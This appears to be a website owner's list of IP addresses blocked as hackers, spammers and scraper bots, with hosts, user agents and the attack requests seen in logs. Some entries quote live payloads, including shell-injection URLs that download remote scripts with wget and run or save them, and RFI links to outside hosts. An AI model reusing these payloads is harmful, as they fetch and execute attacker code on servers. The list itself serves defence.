2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) //images/stories/abc.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
94.242.252.91 Hostname: ip-static-94-242-252-91.as5577.net
Host: Luxembourg – Steinsel Root Sa
Hacker – Looking for wpOnlineStore / osCommerce / Zencart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
User agent: IlTrovatore-Setaccio/1.2 (http: //www.iltrovatore.it/aiuto/faq.html)
87.238.192.84 Host: Germany – Hamburg Artfiles New Media Gmbh
Web server: 1428 websites
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
212.53.128.131 Host: Germany – Hamburg Artfiles New Media Gmbh
Web server: 1033 websites
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
72.249.175.220 Hostname: mvs005-002.directrouter.com
Host: United States – Saint Louis Rochen Limited
Web server: 28 websites
Hacker – Looking for wpOnlineStore / osCommerce / Zencart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
User agent: Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)
69.89.31.249 Hostname: box449.bluehost.com
Host: United States – Temecula Unified Layer
Web server: 2066 websites
Scanning site for various admin exploit
113.53.152.210 Hostname: node-4wi.pool-113-53.dynamic.totbb.net
Host: Thailand – Bangkok Tot Public Company Limited
Dictionary attacker
wp-login.php
88.86.107.14 Hostname: unn-88-86-107-14.superhosting.cz
Host: Czech – Republic Prague Supernetwork S.r.o.
Web server: 27 websites
Hacker:
Looking for Joomla JCE Editor exploit
1) //images/stories/3xp.php
84.97.14.2 Hostname: 2.14.97.84.rev.sfr.net
Host: France – Boulogne-billancourt Societe Francaise Du Radiotelephone S.a.
Spambot:
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome
/27.0.1453.110 Safari/537.36 Squider/0.01
217.31.62.172 Hostname: www-wh02.lhc.ignum.cz
Host: Czech – Republic Prague Ignum S.r.o.
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/config.inc.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
79.174.72.84 Hostname: fe66.hc.ru
Host: Russian Federation – Moscow Hosting Center Ltd.
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) //images/stories/3xp.php
2) //images/stories/70pet.php
3) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
Hits site about 8 timaes daily with around 20 requests
193.110.75.118 Hostname: fe10M2.finfort.com
Host: Ukraine – Donets’k Ojsc Promtelecom
Web server: 23 websites
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) //images/stories/bkht.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
78.175.168.174 Hostname: 78.175.168.174.dynamic.ttnet.com.tr
Host: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Brute force dictionary attack on wp-login.php with user name “admin”
190.240.118.2 Host: Colombia – Medellin Epm Telecomunicaciones S.a. E.s.p.
Web server: 1 website – previsora.gov.co
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
122.201.72.145 Hostname: huayra.turboservers.com.au
Host: Australia – Sydney Net Logistics Pty. Ltd.
Web server: 517 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/headlines/thumb.php?src= etc
66.197.141.156 Hostname: casino-estrategias.es
Host: United States – Scranton Network Operations Center Inc.
Trackback spammer
176.41.248.200 Host: Turkey – Karabaglar Tellcom Esentepe Adsl Pool Brute force dictionary attack on wp-login.php with user name “admin”
78.181.176.92 Hostname: 78.181.176.92.dynamic.ttnet.com.tr
Host: Turkey – Kozakli Turk Telekomunikasyon Anonim Sirketi
Brute force dictionary attack on wp-login.php with user name “admin”
213.5.177.220 Hostname: server.kal-digital.com
Host: United Kingdom – Kent Racksrv Communications Limited
Web server: 122 websites
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
144.76.90.23 Hostname: j.bazqux.com
Host: Germany – Berlin Server Block
Scraper bot: BazQux/2.4
User agent: Mozilla/5.0 (compatible; BazQux/2.4; +https://bazqux.com/fetcher)
80.79.202.14 Host: Netherlands – Amsterdam Info.nl/hf B.v. Bot with malicious user agent Java/1.6.0_45
188.247.132.250 Hostname: public-250.gimelnet.rs
Host: Romania – Bucharest Prime Telecom Srl
Missing any user agent
71.8.216.13 Hostname: mail.parallelslincoln.com
Host: United States – Kearney Charter Communications
Web server: 2 websites – johnherdman.com , parallelslincoln.com
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/config.inc.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
109.190.93.162 Hostname: 162-93-190-109.dsl.ovh.fr
Host: France – Roubaix Ovh Systems
Web server: 1 website – compagniejuridique.com
Hacker: Looking for Joomla JCE Editor exploit
Examples: 1) //images/stories/explore.php
2) //images/stories/explore.php?cmd=cd%20/tmp%20;wget%20http: //sbta.org.br/cache/bugus.log%20;%20perl%20bugus.log%20;%20rm%20-rf%20bugus.log*
61.135.189.176 Host: China – Beijing China Unicom Beijing Province Network Chinese bot: Sogou web spider
UA: Sogou web spider/4.0(+http: //www.sogou.com/docs/help/webmasters.htm#07)
91.121.82.70 Hostname: ks352550.kimsufi.com
Host: France – Roubaix Ovh Systems
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/Specialist/thumb.php?src=http: //blogger.company.papelescreativos.com/wp-login.php
Malicious user agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Bad host: Roubaix Ovh
79.94.163.2 Hostname: 2.163.94.79.rev.sfr.net
Host: France – Paris Societe Francaise Du Radiotelephone S.a.
Spam or malicious bot (Squider)
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36 Squider/0.01
89.89.111.146 Hostname: brn29-1-89-89-111-146.dsl.sta.abo.bbox.fr
Host: France – Brest Bouygues Telecom S.a.
Spam or malicious bot (Squider)
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36 Squider/0.01
212.62.246.217 Host: Norway – Bergen Dataguard As
Web server: 8 websites
Hacker:
Known hacker bot user agent:
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28
Looking for Joomla JCE Editor exploit
Examples: 1) //images/stories/3xp.php
146.185.176.158 Host: Netherlands – Amsterdam Digital Ocean Inc. Spy bot: 200PleaseBot/1.0
UA: Mozilla/5.0 (compatible; 200PleaseBot/1.0; +http://www.200please.com/bot)
Bad host: Digital Ocean Inc (network of hosts running spy bots)
114.141.55.5 Hostname: chicknet.cyberplus.net.id
Host: Indonesia – Jakarta Pt Cyberplus Media Pratama
Brute force dictionary attackerwp-login.php
62.75.169.39 Hostname: euve32956.vserver.de
Host: Germany – Berlin Intergenia Ag
Web server: 12 websites
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) //images/stories/ViAr.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
62.109.30.222 Hostname: lala.ru
Host: Russian Federation – Irkutsk Ispsystem Cjsc
Web server: 2 websites – eaglesafes.ru , vse-dlya-doma-i-kuhni.ru
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) //images/stories/ViAr.php?clone
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
62.161.93.144 Host: France – Blagnac Orange S.a.
Web server: 2 websites – college-smdn.com , college-smdn.fr
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) //images/stories/food/footer.php?clone
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
54.211.233.188 Host: United States – Ashburn Amazon.com Inc. GrowerIdeas Crawler
Another bot hosted by Amazon AWS
88.150.177.98 Hostname: h88-150-177-98.host.redstation.co.uk
Host: United Kingdom – Gosport Redstation Limited
Web server: 39 websites
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) //images/stories/tmp.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
72.249.183.228 Hostname: ivant.com
Host: United States – Arlington Rimuhosting
Web server: 2 websites – hpd1.com , zitan.com.ph
Looking for phpMyAdmin hack vulnerability
Examples:
207.55.247.216 Hostname: loudbaby.com
Host: United States – Columbus Jumpline Inc
Web server: 98 websites
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) //images/stories/ViAr.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
130.75.16.204 Hostname: crawler.dcsec.uni-hannover.de
Host: Germany – Hannover Gottfried Wilhelm Leibniz Universitaet Hannover
Rule breaker – Rubbish bot
http: //crawler.dcsec.uni-hannover.de
146.185.170.99 Host: Netherlands – Amsterdam Digital Ocean Inc. “SEO” spy bot: updown_tester
Bad host: Digital Ocean Inc (network of hosts running spy bots)
65.55.215.77 Hostname: msnbot-65-55-215-77.search.msn.com
Host: United States – Quincy Microsoft Corporation
Rule breaker: reads robots.txt then immediately crawls disallowed paths and file types
User agent:
198.50.100.58 Host: Canada – Montreal Cameleon Media
Web server: 46 websites
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
94.23.252.112 Hostname: ns383387.ovh.net
Host: France – Roubaix Ovh Systems
Web server: 4 websites
Hacker:
Known hacker bot user agents:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
183.78.169.60 Hostname: cp60.mfocus.com.my
Host: Malaysia – Kuala Lumpur Service Hosting
Web server: 52 websites
Hacker:
Known hacker bot user agents:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
217.8.253.97 Hostname: lvps217-8-253-97.vps.webfusion.co.uk
Host: United Kingdom – Derby Webfusion Internet Solutions
Web server: 5 websites
Hacker:
Known hacker bot user agents:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
208.109.184.10 Hostname: ip-208-109-184-10.ip.secureserver.net
Host: United States – New York City Godaddy.com Llc
Web server: 2 websites – cvi200.com , wratings.com
Hacker:
Known hacker bot user agents:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
81.169.137.166 Hostname: h2222757.stratoserver.net
Host: Germany Berlin Strato Ag
Web server: 29 websites
Hacker: Brute force DoS type attack
Known hacker bot user agents:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
81.93.240.124 Hostname: eternis.fr
Host: France – Saint-denis Servers Renting – Eweb
Web server: 5 websites
Hacker bot with user agent KcB @ 2013
Looking for exploit vulnerability in WordPress cufon fonts plugin
85.235.157.114 Hostname: clin15.cassiopea.it
Host: Italy – Ferrara Widestore S.r.l.
Web server: 364 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
107.20.70.26 Hostname: ec2-107-20-70-26.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Malicious bot: CCBot/2.0
Another bad bot from Amazon AWS
72.46.128.70 Hostname: 72-46-128.static.versaweb.net
Host: United States – Chicago Versaweb Llc
Web server: 11 websites
Rogue bot identified as “Mozilla Firefox”
Scanned site for images and stylesheets
176.28.55.108 Hostname: garlic.clove.net.au
Host: Australia – Waterloo Waterloo Access Networks
Web server: 3 websites
Hacker:
Known hacker bot user agents:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/config.inc.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
176.28.55.107 Hostname: server3.cubehost.de
Host: Germany – Koeln Host Europe Gmbh
Web server: 33 websites
Hacker:
Known hacker bot user agents:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/config.inc.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
208.115.111.75 Hostname: eqsg-promo.com
Host: United States – Miami Colopronto
EZOOMS “SEO” Spybot
UA: Mozilla/5.0 (compatible; Ezooms/1.0; help@moz.com)
69.60.119.117 Hostname: eqsg-promo.com
Host: United States – Miami Colopronto
Web server: 18 websites
Hacker – Looking for wpOnlineStore exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
175.126.82.54 Host: Korea, Republic Of – Seoul Hanaro Telecom
Web server: 1 website – jimddos.info
Dictionary brute force attacker
85.214.83.3 Hostname: h1948845.stratoserver.net
Host: Germany – Berlin Strato Ag
Web server: 5 websites
Hacker:
Known hacker bot user agents:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/config.inc.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager
&version=1576&cid=20
85.27.38.46 Hostname: host-85-27-38-46.brutele.be
Host: Belgium – Charleroi Brutele Sc
Web server: 2 websites – maisonintelligente.eu , psychologue-tamines.be
Hacker:
Known hacker bot user agents: 1) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
2) BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b
78.178.134.237 Hostname: 78.178.134.237.dynamic.ttnet.com.tr
Host: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
Example: /wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src=
?file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20wget%20blowbeat.vulcano-music.com/s.txt;%20mv%20s.txt%20s.php%20;%20&phpThumbDebug=9%22;
77.222.40.233 Hostname: vh141.sweb.ru
Host: Russian Federation – Moscow Garant-park-telecom Ltd.
Web server: 482 websites
Hacker looking for VirtueMart RFI exploit
/components/com_virtuemart/themes/pbv_multi/scripts/timthumb.php?
src=http: //picasa.com.hearthstones.info/InjectorThimThumb.php
172.246.127.26 Hostname: 26.127-246-172.rdns.scalabledns.com
Host: United States – Henderson Enzu Inc
Hacker looking for uploadify exploit:
/podhawk/uploadify/uploadify.css
Looking for Open Flash Library exploit
Bad host: Henderson Enzu
89.105.211.230 Hostname: hosting23.skyberate.net
Host: Netherlands – Doetinchem Avira B.v.
Web server: 23 websites
Hacker – Looking for wpOnlineStore exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
78.162.69.190 Host: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi Brute force dictionary attacker
wp-login.php with user name “admin” and multiple passwords
85.105.50.67 Hostname: 85.105.50.67.static.ttnet.com.tr
Host: Turkey – Izmir Turk Telekomunikasyon Anonim Sirketi
Web server: 3 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
81.169.137.166 Hostname: h2222757.stratoserver.net
Host: Germany – Berlin Strato Ag
Web server: 20 websites
Hacker:
Known hacker bot user agents:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=
imgmanager&version=1576&cid=20
90.41.183.25 Hostname: AClermont-Ferrand-652-1-16-25.w90-41.abo.wanadoo.fr
Host: France – Clermont-ferrand Orange S.a.
Malicious bot (Squider)
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36 Squider/0.01
91.142.219.131 Hostname: icn1.microvisio.com
Host: Spain – Toledo Axarnet Comunicaciones Sl
Web server: 49 websites
Hacker – Looking for Joomla JCE Editor exploit
Example: /images/stories/bkht.php
103.14.202.139 Hostname: lynx.nerdster.com.au
Host: Australia – Brisbane Nerdster Pty. Ltd.
Hacker – Looking for Joomla JCE Editor exploit
Example: /images/stories/food.php
81.88.225.204 Hostname: www .rup.cr.it
Host: Italy – Cremona Aemcom Spa
Web server: 6 websites
Hacker – Looking for Joomla JCE Editor exploit
Example: /images/stories/wawalo.php
144.76.69.142 Host: Germany – Berlin Server Block
Hetzner Online AG
Bad bot – Sistrix crawler
Mozilla/5.0 (compatible; SISTRIX Crawler; http: //crawler.sistrix.net/)
82.144.221.113
Host: Ukraine – Kiev Kyivski Telekomunikatsiyni Merezhi Llc
Web server: 41 websites
Hacker:
Known hacker bot user agents: 1) Mozilla/5.0 (Windows; U; Windows NT 5.1;
en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
2) BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: //images/stories/borong.php
//images/stories/70pet.php
//images/stories/3xp.php
And others
95.211.82.239 Hostname: hosted-by.leaseweb.com
Host: Netherlands – Amsterdam Leaseweb B.v.
Web server: 38 websites
Hacker – Looking for wpOnlineStore vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
85.214.37.179 Host: Germany – Berlin Strato Ag
Web server: 20 websites
Hacker – Looking for wpOnlineStore vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
86.122.113.10 Hostname: 86-122-113-10.rdsnet.ro
Host: Romania – Simeria Rcs & Rds Business
Hacker:
Known hacker bot user agents: 1) Mozilla/5.0 (Windows; U; Windows NT 5.1;
en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
2) BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
85.214.91.150 Host: Germany – Berlin Strato Ag
Web server: 6 websites
Hacker:
Known hacker bot user agents: 1) Mozilla/5.0 (Windows; U; Windows NT 5.1;
en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
2) BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: //images/stories/ViAr.php?rf
//images/stories/food/footer.php?clone
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
216.243.174.66 Hostname: hobbes-66.hutman.net
Host: United States – Minneapolis Hutman Inc.
Web server: 39 websites
Hacker:
Known hacker bot user agents: 1) Mozilla/5.0 (Windows; U; Windows NT 5.1;
en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
2) BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: //modules/mod_poll/tmpl/footer.php?clone
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=
imgmanager&version=1576&cid=20
//images/stories/media.php?rf
58.59.233.145 Host: China – Nanning Chinanet Guangxi Province Network Hacker:
Looking for Joomla JCE Editor exploit
Examples: /editor/editor/filemanager/upload/test.html
/FCKeditor/editor/filemanager/connectors/uploadtest.html
198.50.219.180 Hostname: hosting.esnoei.net
Host: Canada – Montreal Ovh Hosting Inc.
Web server: 27 websites
Hacker:
Known hacker bot user agents: 1) Mozilla/5.0 (Windows; U; Windows NT 5.1;
en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
2) BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: //images/stories/ViAr.php?rf
//images/stories/food/footer.php?clone
188.138.106.76 Hostname: mail.datentechnikschwarz.de
Host: Germany – Hurth Intergenia Ag
Web server: 17 websites
Hacker:
Known hacker bot user agent: Mozilla/5.0 (Windows; U; Windows NT 5.1;
en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Example: /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=
imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c
1246b5f=cf6dd3cf1923c950586d0dd595c8e20b
89.42.219.33 Host: Romania – Bucharest Romarg Srl
Web server: 80 websites
Hacker – Malicious bot:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Example:
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=
imgmanager&version=1576&cid=20
216.238.64.106 Host: United States – Philadelphia Alxtech
Web server: 2 websites – alxnetworks.net , tf2blast.com
Trying to hotlink to CSS files
74.221.217.173 Host: United States – Seattle Dme Hosting Llc Spammer trying to post using known script exploit:
/suggerer_site.php?action=meta_get&id_cat
192.99.11.13 Hostname: ks4006354.ip-192-99-11.net
Host: Canada – Montreal Ovh Hosting Inc.
Hacker looking for ColdFusion exploit
Example: /CFIDE/administrator/enter.cfm
Bad host:
74.54.21.178 Hostname: hosting.devproducts.com
Host: United States – Dallas Theplanet.com Internet Services Inc.
Web server: 31 websites
Hacker – Malicious bot:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Some examples: /images/stories/0d4y.php
/&sa=U&ei=tn2hUqu1Caiv2QWZuIHoCg&ved=0CJsBEBYwFw&usg=AFQjCNGMZ2FDXwDEybQwYoYvswqmSG4zIQ//index.php?cid=20&file=
imgmanager&option=com_jce&plugin=imgmanager&task=plugin&version=1576
196.35.74.231 Hostname: jhb-sabcnmtweb.sabc.co.za
Host: South Africa – Pretoria Internet Solutions
Web server: 1 website – sabc1.co.za
Hacker – Malicious bot: (probably hacked website or server)
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Some examples: /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=
imgmanager&version=1576&cid=20
/images/stories/config.inc.php?rf
More Information
78.110.50.104 Hostname: c2-w.ht-systems.ru
Host: Russian Federation – Pavlovskaya Hosting Telesystems Jsc
Web server: 568 websites
Hacker – Looking for admin exploit
Example: //admin/administrators.php/login.php
54.209.131.122 Hostname: ec2-54-196-64-84.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Spy bot / web scraper from Amazon AWS
GermCrawler
54.196.64.84 Hostname: ec2-54-196-64-84.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Spy bot / web scraper from Amazon AWS
CCBot/2.0
85.128.142.66 Hostname: akl66.rev.netart.pl
Host: Poland – Warsaw Netart Spolka Akcyjna Spolka Komandytowo-akcyjna
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
59.106.141.147 Hostname: vts18.digitalink.ne.jp
Host: Japan – Osaka-shi Startia Co. Ltd
Web server: 43 websites
Hacker – Malicious bot:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Some examples: /images/stories/bottom.php?smtp
/images/stories/xperl.php
/images/stories/metri.php
/images/stories/fack.php
54.196.69.105 Hostname: ec2-67-202-18-97.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Spy bot / web scraper from Amazon AWS
CCBot/2.0
67.202.18.97 Hostname: ec2-67-202-18-97.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Spy bot / web scraper from Amazon AWS
CCBot/2.0
54.205.90.81 Hostname: ec2-54-205-90-81.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Another spy bot / web scraper from Amazon AWS
CCBot/2.0
1.221.77.126 Host: Korea, Republic Of – Seoul Boranet
Web server: 10 websites
Hacker – Malicious bot:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: /images/stories/0day.php
/images/stories/70bex.php
/images/stories/iam.php
/images/stories/0d4y.php/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=
imgmanager&version=1576&cid=20
173.254.28.14 Hostname: just14.justhost.com
Host: United States – Provo Unified Layer
Web server: 3633 websites
DoS attack on wp-login.php
144.76.217.17 Hostname: static.17.217.76.144.clients.your-server.de
Host: Germany – Nuremberg Server Block
Web server: 1 website – comart.gr
Hacker – Malicious bot:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE editor exploit
Examples:/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=
imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f
=cf6dd3cf1923c950586d0dd595c8e20b/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version
=1576&cid=20//images/stories/helper.php?rf
202.210.151.73 Hostname: www .uiui.net
Host: Japan – Tokyo Bekkoame/internet
Web server: 1 website – uiui.net
Hacker – Looking for Joomla JCE Editor exploit
Examples: /images/stories/pussy.php?rf
174.142.46.58 Hostname: enuf.coolstuff.co.za
Host: Canada – Montreal Iweb Dedicated Cl
Web server: 94 websites
Hacker looking for SQL exploit
/admin/sqlpatch.php/password_forgotten.php
URL/&;sa=U&;ei=KPmdUuOMGPOg7AbonoHYDg&;ved=0CLoCEBYwLjhk&;usg=AFQjCNFdGQjRXP9D2Ku2EetrM6l-7zsp6A/admin/sqlpatch.php/password_forgotten.php?action=execute
121.78.129.173 Host: Korea, Republic Of – Seoul Kinx
Web server: 33 websites
Hacker – Looking for Joomla JCE Editor exploit
